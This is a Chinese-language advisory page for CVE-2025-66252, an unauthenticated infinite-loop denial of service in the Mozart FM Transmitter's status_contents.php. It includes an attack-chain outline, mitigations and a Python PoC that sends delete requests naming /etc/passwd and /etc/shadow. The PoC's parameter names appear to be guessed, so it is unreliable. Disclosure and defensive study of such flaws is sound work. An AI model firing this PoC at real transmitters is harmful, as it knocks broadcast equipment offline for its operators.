CVE-2025-66252: Mozart FM Transmitter status_contents.php无限循环DoS漏洞

漏洞信息

漏洞编号

CVE-2025-66252

漏洞类型

拒绝服务/无限循环

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter (版本30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000, 7000)

漏洞概述

CVE-2025-66252是DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter设备中的一个高危拒绝服务漏洞。该漏洞存在于status_contents.php文件中，由于unlink()文件删除操作在while循环中执行，当目标文件不可变或进程缺乏删除权限时，删除操作会持续失败并反复重试，导致服务器资源被耗尽，最终引发服务不可用。攻击者可通过网络远程触发此漏洞，无需任何认证或用户交互即可实现DoS攻击，CVSS评分7.5分，属于高危级别。

技术细节

漏洞根源在于status_contents.php文件中的文件删除逻辑存在缺陷。代码使用while循环配合unlink()函数尝试删除文件，但未设置循环退出条件或错误处理机制。当攻击者指定一个不可删除的文件（如只读文件、正在使用的文件或权限不足的文件）作为删除目标时，unlink()调用会持续失败。由于缺少错误检查和循环终止条件，程序会陷入无限循环，不断消耗CPU和内存资源，最终导致Web服务器崩溃或响应缓慢。该漏洞属于逻辑漏洞，攻击者只需构造特定的HTTP请求即可触发，无需特殊权限或复杂利用技术。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Mozart FM Transmitter设备，确认其运行状态并定位status_contents.php端点

STEP 2

步骤2: 构造恶意请求

攻击者构造包含不可删除文件路径（如/etc/passwd或/etc/shadow）的HTTP请求，指定删除操作

STEP 3

步骤3: 触发漏洞

发送请求后，服务器端status_contents.php中的while循环开始执行unlink()操作

STEP 4

步骤4: 无限循环

由于目标文件不可删除，unlink()持续失败，循环无退出条件，导致CPU和内存资源快速耗尽

STEP 5

步骤5: DoS效果

服务器响应变慢或完全无响应，所有依赖该服务的功能瘫痪，攻击者成功实现拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-66252 PoC - Infinite Loop DoS
# Target: Mozart FM Transmitter status_contents.php
# This PoC demonstrates how to trigger the infinite loop by requesting deletion of an immutable file

target_url = "http://target-server/status_contents.php"

# Method 1: Direct request to trigger file deletion loop
params = {
    'action': 'delete',
    'file': '/etc/passwd'  # Immutable system file that cannot be deleted
}

print("[*] Sending DoS request...")
try:
    response = requests.get(target_url, params=params, timeout=10)
    print(f"[*] Response Status: {response.status_code}")
except requests.exceptions.Timeout:
    print("[+] Target is not responding - DoS successful")

# Method 2: POST request with specific parameters
data = {
    'delete_file': '/etc/shadow',  # Another immutable file
    'confirm': 'yes'
}

print("[*] Sending POST DoS request...")
try:
    response = requests.post(target_url, data=data, timeout=10)
    print(f"[*] Response Status: {response.status_code}")
except requests.exceptions.Timeout:
    print("[+] Target is not responding - DoS successful")

影响范围

Mozart FM Transmitter 版本 30

Mozart FM Transmitter 版本 50

Mozart FM Transmitter 版本 100

Mozart FM Transmitter 版本 300

Mozart FM Transmitter 版本 500

Mozart FM Transmitter 版本 1000

Mozart FM Transmitter 版本 2000

Mozart FM Transmitter 版本 3000

Mozart FM Transmitter 版本 3500

Mozart FM Transmitter 版本 6000

Mozart FM Transmitter 版本 7000

防御指南

临时缓解措施

在厂商发布正式补丁前，可通过以下措施临时缓解：1) 使用Web服务器配置限制对status_contents.php的访问，仅允许可信IP访问；2) 部署负载均衡器，将异常请求转发至专用日志服务器；3) 监控系统资源使用情况，设置CPU/内存告警阈值；4) 在应用层添加请求频率限制，阻止短时间内大量请求；5) 临时禁用文件删除功能，待官方修复后再启用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-66252
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-66252
3 Details https://www.cvedetails.com/cve/CVE-2025-66252/
4 VulDB https://vuldb.com/cve/CVE-2025-66252
5 Link https://www.abdulmhsblog.com/posts/webfmvulns/
6 Link https://www.abdulmhsblog.com/posts/webfmvulns/